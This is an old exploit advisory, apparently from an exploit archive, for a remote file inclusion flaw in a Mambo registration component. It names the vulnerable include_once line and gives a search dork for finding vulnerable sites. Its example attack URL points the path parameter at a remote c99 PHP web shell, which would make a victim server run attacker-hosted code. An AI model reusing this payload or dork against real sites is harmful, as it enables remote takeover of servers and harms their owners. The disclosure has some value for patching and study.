[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mambo com_registration_detailed <= 4.1 Remote File Include
# Published : 2006-09-16
# Author : k1tk4t
# Previous Title : GNUTURK <= 2G (t_id) Remote SQL Injection Exploit
# Next Title : UNAK-CMS <= 1.5 (dirroot) Remote File Include Vulnerabilities
########################################################################
# Mambo com_registration_detailed <= 4.1 Remote File Inclusion
#
# Download Source : http://mamboxchange.com/projects/regdetailed/
# Dork = allinur:com_extended_registration
#
# Found By: k1tk4t - k1tk4t[d0t]h4ck[4t]gmail[d0t]com
# Location: Indonesia
########################################################################
file ;
registration_detailed.inc.php
########################################################################
bugs ;
[at]line 25
include_once("$mosConfig_absolute_path/components/com_extended_registration/language/$_REGISTER_DETAILS_LANGUAGE.inc.php");
#########################################################################
example exploit ;
http://victim.xxx/ components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phpshell/c99.txt?
########################################################################
Thanks;
str0ke
milw0rm
google
#e-c-h-o (all member echo community)
#nyubi (all member solpotcrew community)
--> ghoz, home_edition2001, iFX, and for all (friend's&enemy)
# www.Syue.com [2006-09-16]